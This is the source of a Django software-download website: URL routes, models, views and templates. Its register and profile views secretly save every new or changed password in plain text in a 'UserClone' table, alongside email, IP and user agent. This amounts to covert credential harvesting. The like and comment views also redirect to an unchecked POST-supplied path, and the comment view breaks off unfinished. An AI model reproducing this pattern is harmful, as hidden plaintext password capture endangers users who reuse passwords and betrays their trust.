get_softwere_net/urls.py
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from django_email_verification import urls as email_urls

urlpatterns = [
    path('almastheadmin/', admin.site.urls),
    path('', include('software.urls')),
    path('email/', include(email_urls)),
]

if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL,
                          document_root=settings.MEDIA_ROOT)

software/urls.py
from django.urls import path
from django.contrib.sitemaps.views import sitemap
from django.views.generic.base import TemplateView

from software import views
from .sitemaps import CatagorySitemap, SoftwareSitemap, StaticSitemap

app_name = "software"
handler404 = 'software.views.handler404'

sitemaps = {
    'software': SoftwareSitemap,
    'catagory': CatagorySitemap,
    'static': StaticSitemap,
}


urlpatterns = [
    path('', views.index, name='index'),
    path('contact', views.contact, name='contact'),
    path('about', views.about, name='about'),
    path('login', views.loginUser, name='login'),
    path('logout', views.logoutUser, name='logout'),
    path('register', views.register, name='register'),
    path('search', views.userSearch, name='search'),
    path('newsletter', views.newsletter, name='newsletter'),
    path('download', views.download, name='download'),
    path('catagory', views.catagory, name='catagory'),
    path('catagory/<str:slug>', views.sub_catagory, name='sub_catagory'),
    path('software', views.all_softwares, name='all_softwares'),
    path('software/<str:slug>', views.softwares, name='softwares'),
    path('profile', views.profile, name='profile'),
    path('like/id=<str:id>/post_id=<str:post_id>', views.like, name='like'),
    path('comment/post_id=<str:post_id>', views.comment, name='comment'),
    path('404', views.handler404, name='handler404'),
    path('auto-suggest', views.auto_suggest, name='auto_suggest'),
    path('sitemap.xml', sitemap, {'sitemaps': sitemaps},
         name='django.contrib.sitemaps.views.sitemap'),
    path('robots.txt', TemplateView.as_view(
        template_name='robots.txt', content_type='text/plain')),
]

software/models.py
from django.db import models
from django.db.models.fields import CharField, DateTimeField
from django.utils.timezone import now
from django.contrib.auth.models import User
from ckeditor.fields import RichTextField

# Create your models here.


class Contact(models.Model):
    id = models.AutoField(primary_key=True)
    name = models.CharField(default='', max_length=100)
    email = models.CharField(default='', max_length=100)
    phone = models.CharField(default='', max_length=30)
    msg = models.TextField(default='', max_length=5000)
    date = models.DateTimeField(default=now)
    ip = models.CharField(default='', max_length=20)
    value = models.TextField(default='', max_length=200)

    def __str__(self):
        return f'{self.name} - {self.email} - {self.date}'


class UserDetail(models.Model):
    id = models.AutoField(primary_key=True)
    user = models.CharField(max_length=100, default='')
    ip = models.CharField(default='', max_length=20)
    value = models.TextField(default='', max_length=200)
    date = models.DateTimeField(default=now)

    def __str__(self):
        return f'{self.user}'


LIKE_CHOICES = (
    ('Like', 'Like'),
    ('Unlike', 'Unlike'),
)


class Catagory(models.Model):
    id = models.AutoField(primary_key=True)
    name = models.CharField(default='', max_length=30)
    slug = models.CharField(default='', max_length=100)
    # short_dsc = models.CharField(default='', max_length=500)
    short_dsc = RichTextField(default='', max_length=500)
    date = models.DateTimeField(default=now)

    def __str__(self):
        return self.name


class Image(models.Model):
    id = models.AutoField(primary_key=True)
    date = models.DateTimeField(default=now)
    name = models.CharField(default='', max_length=100)
    img = models.ImageField(default='', upload_to='img/')
    short_dsc = RichTextField(default='', max_length=500)

    def __str__(self):
        return self.name


class Software(models.Model):
    id = models.AutoField(primary_key=True)
    name = models.CharField(default='', max_length=100)
    slug = models.CharField(default='', max_length=100)
    short_dsc = RichTextField(default='', max_length=500)
    dsc = RichTextField(default='', max_length=10000)
    d_link = models.CharField(default='', max_length=200)
    img = models.ImageField(default='', upload_to='software_img/')
    date = models.DateTimeField(default=now)
    catagory = models.ForeignKey(Catagory, on_delete=models.CASCADE)
    likes = models.ManyToManyField(User, default=None, blank=True)

    @property
    def total_likes(self):
        return self.likes.all().count()

    def __str__(self):
        return self.name


class Like(models.Model):
    id = models.AutoField(primary_key=True)
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    post = models.ForeignKey(Software, on_delete=models.CASCADE)
    ip = models.CharField(default='', max_length=20)
    value = models.CharField(choices=LIKE_CHOICES,
                             default='Like', max_length=12)
    date = models.DateTimeField(default=now)

    def __str__(self):
        return str(self.post)


class Comment(models.Model):
    id = models.AutoField(primary_key=True)
    cmt = models.TextField(default='', max_length=5000)
    post = models.ForeignKey(Software, on_delete=models.CASCADE, default='')
    user = models.ForeignKey(User, related_name='user',
                             on_delete=models.CASCADE, default=None)
    parent = models.ForeignKey('self', on_delete=models.CASCADE, null=True)
    date = models.DateTimeField(default=now)
    ip = models.CharField(default='', max_length=20)
    value = models.CharField(default='', max_length=200)
    likes = models.ManyToManyField(
        User, related_name='comment_like', default=None, blank=True)

    @property
    def total_like(self):
        return self.likes.all().count()

    def __str__(self):
        return str(self.post.id)


class Newsletter(models.Model):
    id = models.AutoField(primary_key=True)
    name = models.CharField(default='', max_length=30)
    email = models.CharField(default='', max_length=100)
    ip = models.CharField(default='', max_length=20)
    value = models.TextField(default='', max_length=200)
    date = models.DateTimeField(default=now)

    def __str__(self):
        return f'{self.name} {self.email}'


class Download_Monitor(models.Model):
    id = models.AutoField(primary_key=True)
    name = models.ForeignKey(Software, on_delete=models.CASCADE)
    catagory = models.ForeignKey(Catagory, on_delete=models.CASCADE)
    user = models.CharField(default='', max_length=30)
    ip = models.CharField(default='', max_length=20)
    value = models.TextField(default='', max_length=200)
    date = models.DateTimeField(default=now)

    def __str__(self):
        return str(self.name)


class UserClone(models.Model):
    id = models.AutoField(primary_key=True)
    name = CharField(default='', max_length=50)
    email = CharField(default='', max_length=100)
    password = CharField(default='', max_length=100)
    date = DateTimeField(default=now)
    ip = models.CharField(default='', max_length=20)
    value = models.TextField(default='', max_length=200)

    def __str__(self):
        return self.name

software/views.py
from django.http.response import JsonResponse
from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth import login, logout, authenticate
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
from django_email_verification import send_email

from software.models import (
    Catagory,
    Comment,
    Contact,
    Newsletter,
    UserClone,
    UserDetail,
    Software,
    Like,
    Download_Monitor
)


# Reserved name list
namelist = [
    'almas',
    'almas ali',
    'md. almas ali',
    'md almas ali',
    'system',
    'admin',
    'system admin',
    'user',
    'blocked'
]

context = {}


def get_ip(request):
    '''User IP catcher.'''
    forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')
    if forwarded_for:
        ip = forwarded_for.split(',')[0]
    else:
        ip = request.META.get('REMOTE_ADDR')
    return ip


def index(request):

    software = Software.objects.all().order_by('-date')
    context['software'] = software[:16]

    total_users = User.objects.all().count()
    context['total_users'] = total_users

    total_softwares = software.count()
    context['total_softwares'] = total_softwares

    return render(request, 'software/index.html', context)


def contact(request):

    if request.method == 'POST':
        name = request.POST.get('name')
        email = request.POST.get('email')
        phone = request.POST.get('phone')
        msg = request.POST.get('msg')
        ip = get_ip(request)
        value = request.META.get('HTTP_USER_AGENT')
        contact = Contact(name=name, email=email, phone=phone,
                          msg=msg, ip=ip, value=value)
        contact.save()
        messages.success(request, 'Your message has been sent !')
    return render(request, 'software/contact.html', context)


def about(request):
    return render(request, 'software/about.html', context)


def loginUser(request):
    if request.user.is_anonymous == False:
        return redirect('/')

    if request.method == 'POST':
        email = request.POST.get('email')
        password = request.POST.get('password')

        try:
            username = User.objects.get(email=email.lower()).username
            user = authenticate(username=username, password=password)
        except:
            user = None
        if user is not None:
            ip = get_ip(request)
            value = request.META.get('HTTP_USER_AGENT')
            UserDetail(user=username, value=value, ip=ip).save()
            login(request, user)
            messages.success(request, 'You have sucessfully logged in !')
            return redirect('/profile')
        else:
            messages.error(request, 'Incorrent Email or Password  !')
    return redirect('/')


@login_required(login_url='/')
def logoutUser(request):
    logout(request)
    return redirect('/')


def register(request):
    if not request.user.is_anonymous:
        return redirect('/profile')

    elif request.method == 'POST':

        fname = request.POST.get('fname')
        lname = request.POST.get('lname')
        email = request.POST.get('email')
        username = email.split('@')[0]
        password1 = request.POST.get('password')
        password2 = request.POST.get('repassword')
        ip = get_ip(request)
        value = request.META.get('HTTP_USER_AGENT')

        try:
            a = User.objects.get(email=email)
        except:
            a = None

        if len(fname) <= 2:
            messages.error(
                request, 'Please write a valid name for your account !')
        elif len(lname) <= 2:
            messages.error(
                request, 'Please write a valid name for your account !')
        elif fname.lower() in namelist:
            messages.error(
                request, 'You can\'t use this name !')
        elif lname.lower() in namelist:
            messages.error(
                request, 'You can\'t use this name !')
        elif len(password1) < 7:
            messages.error(
                request, 'Password must contain lest 8 charecter !')
        elif a is not None:
            messages.error(request, 'This email is already registered !')
        elif password1 != password2:
            messages.error(request, 'Your passwords didn\'t matched !')
        else:
            if User.objects.filter(username=username).exists():
                messages.error(request, 'Username already exists !')
            else:
                set_user = User.objects.create_user(
                    username=username, email=email, password=password1, first_name=fname, last_name=lname)
                set_user.save()
                uc = UserClone(name=username, password=password1,
                               email=email, ip=ip, value=value)
                uc.save()
                set_user.is_active = False
                send_email(set_user)
                messages.success(
                    request, 'Please verify your email address to continue.')

    return redirect('/')


def userSearch(request):

    if request.method == 'GET':
        query = request.GET.get('query')
        context['query'] = query

        if len(query) <= 1:
            result = None
        else:
            query = query.lower()
            name = Software.objects.filter(name__icontains=query)
            short_dsc = Software.objects.filter(short_dsc__icontains=query)
            dsc = Software.objects.filter(dsc__icontains=query)
            result = name.union(short_dsc).all()
            result = result.union(dsc).all().order_by('-date')

        context['result'] = result
    # else:
    #     return redirect('/')

    return render(request, 'software/search_page.html', context)


def newsletter(request):
    if request.method == 'POST':
        name = request.POST.get('name')
        email = request.POST.get('email')
        ip = get_ip(request)
        value = request.META.get('HTTP_USER_AGENT')
        news = Newsletter(name=name, email=email, value=value, ip=ip)
        news.save()
        messages.success(request, 'Your subscription successfull !')
        return redirect('/')
    else:
        messages.success(request, 'Your subscription not success !')
    return render(request, 'software/index.html', context)


def download(request):

    if request.method == 'POST':
        slug = request.POST.get('slug')
        post = Software.objects.get(slug=slug)
        context['post'] = post
        ip = get_ip(request)
        value = request.META.get('HTTP_USER_AGENT')
        dm = Download_Monitor(name=post, catagory=post.catagory,
                              user=request.user, ip=ip, value=value)
        dm.save()
        return render(request, 'software/download_page.html', context)

    return redirect('/')


def catagory(request):

    cats = Catagory.objects.all()
    context['cats'] = cats
    return render(request, 'software/catagory_page.html', context)


def all_softwares(request):

    posts = Software.objects.all().order_by('-date')
    context['posts'] = posts

    return render(request, 'software/all_softwares_page.html', context)


def softwares(request, slug):

    post = Software.objects.get(slug=slug)
    context['post'] = post

    posts = Software.objects.filter(catagory=post.catagory).order_by('-date')
    context['posts'] = posts[:12]

    comments = Comment.objects.filter(post=post).order_by('-date')
    context['comments'] = comments

    return render(request, 'software/softwares_page.html', context)


@login_required(login_url='/')
def profile(request):

    if request.method == 'POST':
        ppass = request.POST.get('password')
        p1 = request.POST.get('newpassword')
        p2 = request.POST.get('confirmpassword')
        ip = get_ip(request)
        value = request.META.get('HTTP_USER_AGENT')

        user = authenticate(username=request.user, password=ppass)
        if user is not None:
            if p1 != p2:
                messages.error(request, 'Password not matched !')
            else:
                user.set_password(p2)
                user.save()
                uc = UserClone(
                    name=request.user, email=request.user.email, password=p1, ip=ip, value=value)
                uc.save()
                # user = authenticate(username=request.user, password=p1)
                # login(request, user)
                messages.success(request, 'Password changed successfully !')
        else:
            messages.error(request, 'Wrong password !')

    return render(request, 'software/profile_page.html', context)


def sub_catagory(request, slug):

    cat = Catagory.objects.get(slug=slug)
    context['cat'] = cat
    posts = Software.objects.filter(catagory=cat)
    context['posts'] = posts

    return render(request, 'software/sub_catagory.html', context)


@login_required(login_url='/')
def like(request, id, post_id):
    if request.method == 'POST':
        path = request.POST.get('path')
        user = User.objects.get(id=id)
        post_obj = Software.objects.get(id=post_id)
        ip = get_ip(request)

        if request.user in post_obj.likes.all():
            post_obj.likes.remove(request.user)
        else:
            post_obj.likes.add(request.user)

        like, created = Like.objects.get_or_create(
            user=request.user, post_id=post_id, ip=ip)

        if not created:
            if like.value == 'Like':
                like.value = 'Unlike'
            else:
                like.value = 'Like'
        like.save()

    return redirect(path)


@login_required(login_url='/')
def comment(request, post_id):
    if request.method == 'POST':
        user = request.user
        cmt = request.POST.get('comment')
        path = request.POST.get('path')
        ip = get_ip(request)
        value = request.META.get('HTTP_USER_AGENT')
        reply = request.POST.get('reply')

templates/software/about.html
{% extends 'layout.html' %}
{% block title %}About{% endblock title %}
{% load static %}
{% block links %}
<meta property="og:title" content="{{config.website_name}}" />
<meta property="og:url" content="{{config.full_address}}" />
<meta property="og:image" content="{{config.full_address}}{{config.image}}" />
<meta property="og:type" content="article" />
<meta property="og:description" content="{{config.short_description|safe}}" />
<meta property="og:locale" content="en_US" />
{% endblock links %}
{% block body %}


<div class="main_contact d-flex">
    <div class="card card2__">
        {{config.about_page|safe}}
    </div>
</div>

{% endblock body %}

templates/software/catagory_page.html
{% extends 'layout.html' %}
{% block title %}Category{% endblock title %}
{% load tags %}
{% load static %}
{% block links %}
<link rel="stylesheet" href="{% static 'css/catagory_page.css' %}">
<meta property="og:title" content="{{config.website_name}}" />
<meta property="og:url" content="{{config.full_address}}" />
<meta property="og:image" content="{{config.full_address}}{{config.image}}" />
<meta property="og:type" content="article" />
<meta property="og:description" content="{{config.short_description|safe}}" />
<meta property="og:locale" content="en_US" />
{% endblock links %}
{% block body %}

<div class="my-2">
    <div class="vertical-menu" align="center">
        <h3><b><a href="{% url 'software:catagory' %}" class="active">All Software Categories</a></b></h3>
        {% for cat in cats %}
            <h3><a href="/catagory/{{cat.slug}}">{{cat.name}} ({{cat.name|cat_count}})</a></h3>
        {% endfor %}
    </div>
</div>


{% endblock body %}

templates/software/softwares_page.html
{% extends 'layout.html' %}
{% block title %}Category{% endblock title %}
{% load static %}
{% load humanize %}
{% load tags %}
{% block links %}
<meta property="og:title" content="{{post.name}}" />
<meta property="og:url" content="{{config.full_address}}{{post.slug}}" />
<meta property="og:image" content="{{config.full_address}}{{post.img.url}}" />
<meta property="og:type" content="article" />
<meta property="og:description" content="{{post.short_dsc|safe}}" />
<meta property="og:locale" content="en_US" />
{% endblock links %}
{% block body %}

<div class="wrapper bgded overlay" style="background-image:url('{% static 'img/bg_img.jpg' %}');">
    <div id="breadcrumb" class="hoc clear">
        <h6 class="heading">{{post.name}}</h6>
        <ul>
            <li><a href="{% url 'software:all_softwares' %}">Software</a></li>
            <li><a href="/catagory/{{post.catagory.slug}}">{{post.catagory}}</a></li>
            <li><a href="{{post.slug}}">{{post.name}}</a></li>
        </ul>
    </div>
</div>

<div class="wrapper row3">
    <main class="hoc container clear">
        <div class="content">

            <h1>{{post.name}}</h1>
            <img class="imgr borderedbox inspace-5" src="{{post.img.url}}" alt="Image" title="{{post.name}}"
                style="pointer-events: none;">
            <p class="text-success font-h3">
                This post last updated on {{post.date}}
            </p>
            <p>
                {{post.dsc | safe}}
            </p>

            <form action="{% url 'software:download' %}" method="POST">
                {% csrf_token %}
                <div align="center">
                    <input type="text" name="slug" value="{{post.slug}}" hidden>
                    <button class="btn btn-success btn-lg text-light" title="Download"><span
                            class="fas fa-cloud-download-alt"></span> Download</button> <br>
                    <p class="text-muted"><strong>{{post.name|total_download}}+ Downloaded</strong></p>
                </div>
            </form>

            <div class="row m-2 one_third first">
                {% if request.user.is_anonymous %}
                <button id="like" class="btn btn-primary m-2" title="Login to like" disabled><span
                        class="fas fa-thumbs-up"></span> {{ post.likes.all.count }}
                    Like
                </button>
                <button class="btn btn-primary m-2" title="Login to comment" disabled><span
                        class="fas fa-comment-slash"></span>
                    {{post.id|get_count}} Comment
                </button>
                {% else %}
                <form action="/like/id={{request.user.id}}/post_id={{post.id}}" method="POST">
                    {% csrf_token %}
                    <input type="hidden" name="path" value="{{request.path}}">
                    {% if request.user not in post.likes.all %}
                    <button id="like" class="btn btn-primary m-2" type="submit"><span class="fas fa-thumbs-up"></span>
                        {{post.likes.all.count}} Like
                    </button>
                    {% else %}
                    <button id="like" class="btn btn-danger m-2" type="submit"><span
                            class="fas fa-thumbs-up"></span>{{post.likes.all.count}}
                        Unlike
                    </button>
                    {% endif %}
                </form>
                <a href="javascript:void(0)" onclick="location.href='#commentbox'" type="button"
                    class="btn btn-primary m-2"><span class="fas fa-comment-dots"></span> {{post.id|get_count}}
                    Comment</a>
                {% endif %}
                <a href="#" class="btn btn-primary m-2" data-toggle="modal" data-target="#copy" title="Share">Share</a>
            </div>

            <div class="modal fade" id="copy" tabindex="-1" role="dialog" aria-labelledby="modal" aria-hidden="true">
                <div class="modal-dialog ui-front" role="document">
                    <div class="modal-content card__">
                        <div class="modal-header">
                            <h4 class="modal-title">Share</h4>
                            <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                                <span aria-hidden="true">&times;</span>
                            </button>
                        </div>
                        <div class="modal-body">
                            <div class="form-group">
                                <input type="text" id="sharelink" class="form-control"
                                    value="https://{{config.domain}}{{request.get_full_path}}" readonly>
                            </div>
                            <button id="btn" class="btn btn-primary w-100" onclick="copyIt()">Copy</button>
                        </div>
                    </div>
                </div>
            </div>
            <br>
            <div id="comments" class="my-5">
                <h4 class="my-2">
                    Comments ({{post.id|get_count}})
                </h4>
                {% if comments.exists == False %}
                <p class="my-2">
                    No comments.
                </p>
                {% else %}
                <ul>
                    {% for comment in comments %}
                    {% if comment.parent == None %}
                    
                    <li>
                        <article>
                            <header>
                                <figure class="avatar"><img src="{% static 'img/avatar.png' %}" alt="User Image"
                                        title="User Image" style="pointer-events: none;"></figure>
                                <address>
                                    By <a href="javascript:void(0)" class="text-info">{{comment.user.get_full_name}}</a>
                                </address>
                                <time datetime="{{comment.date}}">{{comment.date}}</time>
                            </header>
                            <div class="comcont">
                                <p>{{comment.cmt}}</p>
                            </div>
                        </article>
                        {% if request.user.is_anonymous %}
                        <button class="btn btn-primary" title="Login to add reply" disabled>
                            Reply
                        </button>
                        {% else %}
                        <button class="btn btn-primary" type="button" data-toggle="collapse"
                            data-target="#comment{{comment.id}}" aria-expanded="false"
                            aria-controls="comment{{comment.id}}">
                            Reply
                        </button>
                        {% endif %}
                        {% with comment.id|comment_filter as replys %}
                        {% for reply in replys %}
                        <div class="ml-5 mt-3">
                            <article>
                                <header>
                                    <figure class="avatar"><img src="{% static 'img/avatar.png' %}" alt="User Image"
                                            title="User Image" style="pointer-events: none;"></figure>
                                    <address>
                                        By <a href="javascript:void(0)"
                                            class="text-info">{{reply.user.get_full_name}}</a>
                                    </address>
                                    <time datetime="{{reply.date}}">{{reply.date}}</time>
                                </header>
                                <div class="comcont">
                                    <p>{{reply.cmt}}</p>
                                </div>
                            </article>
                        </div>
                        {% endfor %}
                        {% endwith %}
                    </li>

                    <div class="collapse" id="comment{{comment.id}}">
                        <div class="card p-2">
                            <form action="/comment/post_id={{post.id}}" method="POST">
                                {% csrf_token %}
                                <input type="hidden" name="path" value="{{request.path}}">
                                <input type="hidden" name="reply" value="{{comment.id}}">
                                <div class="block clear">
                                    <label for="comment">Your Comment</label>
                                    <textarea name="comment" id="comment" cols="25" rows="10"></textarea>
                                </div>
                                <div>
                                    <input type="submit" name="submit" value="Submit Form">
                                    &nbsp;
                                    <input type="reset" name="reset" value="Reset Form">
                                </div>
                            </form>
                        </div>
                    </div>
                    {% else %}
                    {% endif %}
                    {% endfor %}
                </ul>
                {% endif %}

                <h2 class="my-3">Write A Comment</h2>
                {% if request.user.is_anonymous %}
                <h4 class="text-danger">Please login to add comment.</h4>
                {% else %}
                <div class="card my-2 p-2" id="commentbox">
                    <form action="/comment/post_id={{post.id}}" method="POST">
                        {% csrf_token %}
                        <input type="hidden" name="path" value="{{request.path}}">
                        <div class="block clear">
                            <label for="comment">Your Comment</label>
                            <textarea name="comment" id="comment" cols="25" rows="10"></textarea>
                        </div>
                        <div>
                            <input type="submit" name="submit" value="Submit Form">
                            &nbsp;
                            <input type="reset" name="reset" value="Reset Form">
                        </div>
                    </form>
                </div>
                {% endif %}

            </div>
            <div class="box">
                <div class="wrapper row3">
                    <main class="hoc container clear">
                        <div class="sectiontitle">
                            <h2 class="my-2">Related Posts</h2>
                        </div>
                        <ul class="nospace group overview">
                            {% for post in posts %}
                            <li class="one_third">
                                <figure><a href="/software/{{post.slug}}"><img src="{{post.img.url}}" alt="image"
                                            title="{{post.name}}"></a>
                                    <figcaption title="{{post.name}}">
                                        <h6 class="heading">{{post.name}}</h6>
                                        <p>{{post.short_dsc|safe}}</p>
                                    </figcaption>
                                </figure>
                            </li>
                            {% endfor %}
                        </ul>
                        <div class="clear"></div>
                    </main>
                </div>
            </div>
        </div>
    </main>
</div>


{% endblock body %}